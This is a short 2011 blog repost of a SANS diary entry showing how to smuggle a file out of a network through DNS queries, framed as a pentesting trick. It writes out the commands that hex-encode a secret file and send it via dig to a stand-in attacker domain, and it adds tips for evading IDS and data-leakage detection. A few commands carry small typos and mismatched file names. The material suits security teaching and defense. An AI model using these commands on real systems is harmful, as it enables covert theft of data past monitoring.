FTDNS example

January 25, 2011

Here is an FTDNS example (File Transfer via DNS) from Johannes B. Ullrich, Ph.D.  (http://isc.sans.edu/diary.html?storyid=10306):

File transfer via DNS

For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.

First, we convert the file to be transferred via xxd into a hex stream.

xxd -p secret > file.hex

next, we read each line from file.hex, and “transmit” it as a DNS query.

for b in `cat file.hex `; do dig $b.shell.evilexample.com; done

This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.

tcdpump -w /tmp/dns -s0 port 53 and host system.example.com

Then, we extract the messages from the packet capture

tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt

The “uniq” may not be necessary, but I find that the DNS messages may be resend once in a while if the response isn’t fast enough.

Finally, just reverse the hex encoding:

xxd -r -p < receivedu.txt > keys.pgp

And you are done! FTDNS (File Transfer via DNS) without installing any special tools on “system.example.com”

Bonus: shorter lines from xxd and maybe a quick xor may make it even harder for an IDS/Data Leakage system to “see” this kind of data.

Defense: Watch you DNS logs!

[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html
[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf

——
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter